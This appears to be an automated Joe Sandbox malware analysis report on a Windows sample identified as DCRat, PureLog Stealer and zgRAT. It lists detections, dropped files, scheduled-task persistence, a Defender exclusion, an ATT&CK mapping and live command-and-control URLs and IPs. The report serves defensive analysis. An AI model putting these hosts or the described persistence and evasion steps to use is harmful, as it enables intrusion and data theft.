                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeQueries volume information: C:\Windows\Containers\GFIYCbjKVID.exe VolumeInformation
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeQueries volume information: C:\Windows\Containers\GFIYCbjKVID.exe VolumeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeQueries volume information: C:\Users\user\Desktop\ntoskrnl2.exe VolumeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeQueries volume information: C:\Users\user\Desktop\ntoskrnl2.exe VolumeInformation
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeQueries volume information: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe VolumeInformation
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 360, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GFIYCbjKVID.exe PID: 8040, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected DCRat
                    Source: Yara matchFile source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 360, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ntoskrnl2.exe PID: 7516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: GFIYCbjKVID.exe PID: 8040, type: MEMORYSTR
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104904231.000000001272D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.ntoskrnl2.exe.1b140000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2121676520.000000001B140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    Scripting                    		11
                    Process Injection                    		133
                    Masquerading                    		OS Credential Dumping11
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager31
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSync2
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem14
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589204 Sample: ntoskrnl2.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 60 128538cm.n9shteam3.top 2->60 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Antivirus detection for dropped file 2->68 70 11 other signatures 2->70 8 ntoskrnl2.exe 4 25 2->8         started        12 ntoskrnl2.exe 2->12         started        15 GFIYCbjKVID.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 46 C:\Windows\PLA\TemplatesbehaviorgraphFIYCbjKVID.exe, MS-DOS 8->46 dropped 48 C:\Windows\Migration\WTRbehaviorgraphFIYCbjKVID.exe, MS-DOS 8->48 dropped 50 C:\Windows\ContainersbehaviorgraphFIYCbjKVID.exe, MS-DOS 8->50 dropped 58 8 other malicious files 8->58 dropped 78 Adds a directory exclusion to Windows Defender 8->78 80 Creates processes via WMI 8->80 19 cmd.exe 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 4 other processes 8->26 62 128538cm.n9shteam3.top 37.44.238.250, 49704, 80 HARMONYHOSTING-ASFR France 12->62 52 C:\Users\user\Desktop\olnMZMXE.log, PE32 12->52 dropped 54 C:\Users\user\Desktop\dxIWpAcW.log, PE32 12->54 dropped 56 C:\Users\user\Desktop56ewzHbtF.log, PE32 12->56 dropped 82 Multi AV Scanner detection for dropped file 15->82 file6 signatures7 process8 signatures9 72 Uses ping.exe to sleep 19->72 74 Uses ping.exe to check the status of other devices and networks 19->74 28 conhost.exe 19->28         started        44 3 other processes 19->44 76 Loading BitLocker PowerShell Module 22->76 30 conhost.exe 22->30         started        32 WmiPrvSE.exe 22->32         started        34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        38 conhost.exe 26->38         started        40 conhost.exe 26->40         started        42 conhost.exe 26->42         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    ntoskrnl2.exe76%VirustotalBrowse
                    ntoskrnl2.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    ntoskrnl2.exe100%AviraTR/Dropper.Gen
                    ntoskrnl2.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat100%AviraBAT/Delbat.C
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%AviraTR/Dropper.Gen
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\fscFeKAz.log100%AviraHEUR/AGEN.1300079
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%AviraTR/Dropper.Gen
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\Desktop\olnMZMXE.log100%AviraHEUR/AGEN.1300079
                    C:\Users\user\Desktop\NgAzKpfk.log100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\fscFeKAz.log100%Joe Sandbox ML
                    C:\Users\user\Desktop\dxIWpAcW.log100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe100%Joe Sandbox ML
                    C:\Users\user\Desktop\olnMZMXE.log100%Joe Sandbox ML
                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Recovery\GFIYCbjKVID.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Users\user\Desktop\NewzHbtF.log25%ReversingLabs
                    C:\Users\user\Desktop\NgAzKpfk.log8%ReversingLabs
                    C:\Users\user\Desktop\clfwIsGE.log25%ReversingLabs
                    C:\Users\user\Desktop\dxIWpAcW.log8%ReversingLabs
                    C:\Users\user\Desktop\fscFeKAz.log17%ReversingLabs
                    C:\Users\user\Desktop\olnMZMXE.log17%ReversingLabs
                    C:\Windows\Containers\GFIYCbjKVID.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\Migration\WTR\GFIYCbjKVID.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                    C:\Windows\PLA\Templates\GFIYCbjKVID.exe76%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://128538cm.n9shteam3.top/0%Avira URL Cloudsafe
                    https://ion=v4.5w0%Avira URL Cloudsafe
                    http://crl.micRjj0%Avira URL Cloudsafe
                    http://128538cm.n9shteam3.top0%Avira URL Cloudsafe
                    http://schemas.micrwD0%Avira URL Cloudsafe
                    http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    128538cm.n9shteam3.top
                    		37.44.238.250
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.phptrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.micRjjpowershell.exe, 00000019.00000002.3437459667.000001DF682F4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.3078545341.0000026B5B732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2959531615.0000020890072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3132420898.000001DF5FF12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3139105801.000001CF5B0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://128538cm.n9shteam3.top/ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.2188394270.0000026B4B8E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14797000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF500C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://128538cm.n9shteam3.topntoskrnl2.exe, 00000025.00000002.2162764443.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.micrwDpowershell.exe, 00000015.00000002.3307110004.00000208E84A6000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000014.00000002.2188394270.0000026B4B8E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14797000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF500C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.3078545341.0000026B5B732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2959531615.0000020890072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3132420898.000001DF5FF12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3139105801.000001CF5B0C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.micpowershell.exe, 00000014.00000002.3375326418.0000026B639A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Iconpowershell.exe, 0000001D.00000002.3115708283.000002A2B8B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.microsoft.powershell.exe, 00000019.00000002.3437459667.000001DF682F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.micft.cMicRosofpowershell.exe, 00000014.00000002.3375326418.0000026B639A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000014.00000002.2188394270.0000026B4B6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF4FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8AB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namentoskrnl2.exe, 00000000.00000002.2059905488.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2188394270.0000026B4B6C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2177899040.0000020880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2186667974.0000015A14571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2192234501.000001DF4FEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2192299252.000001CF4B051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2185870534.000002A2A8AB1000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl2.exe, 00000025.00000002.2162764443.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.2185870534.000002A2A8CD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ion=v4.5wpowershell.exe, 00000015.00000002.3307110004.00000208E84A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    37.44.238.250
                                                    		128538cm.n9shteam3.topFrance
                                                    		49434HARMONYHOSTING-ASFRtrue

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1589204
                                                    Start date and time:2025-01-11 16:32:07 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 33s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:44
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:ntoskrnl2.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@33/52@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 8.3%
                                                    HCA Information:Failed
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target GFIYCbjKVID.exe, PID 7420 because it is empty
                                                    • Execution Graph export aborted for target GFIYCbjKVID.exe, PID 7436 because it is empty
                                                    • Execution Graph export aborted for target GFIYCbjKVID.exe, PID 8040 because it is empty
                                                    • Execution Graph export aborted for target ntoskrnl2.exe, PID 7516 because it is empty
                                                    • Execution Graph export aborted for target ntoskrnl2.exe, PID 7532 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 1868 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 2824 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 432 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 4508 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5764 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 7088 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    10:33:01API Interceptor179x Sleep call for process: powershell.exe modified
                                                    10:33:10API Interceptor1x Sleep call for process: ntoskrnl2.exe modified
                                                    16:33:00Task SchedulerRun new task: GFIYCbjKVID path: "C:\Windows\Containers\GFIYCbjKVID.exe"
                                                    16:33:00Task SchedulerRun new task: GFIYCbjKVIDG path: "C:\Windows\Containers\GFIYCbjKVID.exe"
                                                    16:33:00Task SchedulerRun new task: ntoskrnl2 path: "C:\Users\user\Desktop\ntoskrnl2.exe"
                                                    16:33:01Task SchedulerRun new task: ntoskrnl2n path: "C:\Users\user\Desktop\ntoskrnl2.exe"

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37.44.238.250WinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • fsin.top/javascriptCentraldownloads.php
                                                    loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                                                    PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 505905cm.n9shka.top/imagePollLinuxCentral.php
                                                    r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                    cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • whware.top/RequestLowGeoLongpollWordpress.php
                                                    vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                    8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 703648cm.renyash.top/provider_cpugame.php
                                                    4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                    Qsi7IgkrWa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                    4Awb1u1GcJ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 143840cm.nyashteam.ru/DefaultPublic.php

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    128538cm.n9shteam3.topactive key.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 80.211.144.156

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    HARMONYHOSTING-ASFRWinPerfcommon.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    loader.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    PlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    • 37.44.238.250
                                                    dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 37.44.238.94
                                                    dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 37.44.238.94
                                                    dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 37.44.238.94
                                                    dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                    • 37.44.238.94

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeactive key.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      C:\Users\user\Desktop\NewzHbtF.logtop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        DC86.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
